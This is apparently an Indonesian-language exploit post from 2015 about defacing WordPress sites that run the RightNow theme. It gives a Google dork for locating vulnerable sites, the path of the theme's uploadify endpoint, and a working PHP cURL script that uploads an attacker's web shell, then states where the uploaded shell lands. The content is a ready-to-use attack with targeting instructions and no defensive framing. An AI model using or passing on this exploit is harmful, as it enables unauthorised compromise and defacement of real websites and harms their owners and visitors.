Deface Menggunakan WordPress RightNow Theme Uploadify Shell Upload

# Title :  WordPress RightNow Theme Uploadify Shell Upload

# Author : eX-Sh1Ne Dork

# Date : 04/04/2015

# Dork : inurl:"wp-content/themes/RightNow/" ( silahkan di experimen sendiri dork nya )

# Vuln : http://www.site.com/path/wp-content/them..._image.php


# Ganti up.php dengan nama shell agan yg udh di copas ke folder c:\xampp\php ( bagi pengguna Windus )

<?php

$uploadfile="up.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/RightNow//includes/uploadify/upload_background_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

# Shell Uploaded At www.site.com/wp-content/uploads/galleryimages/shell.php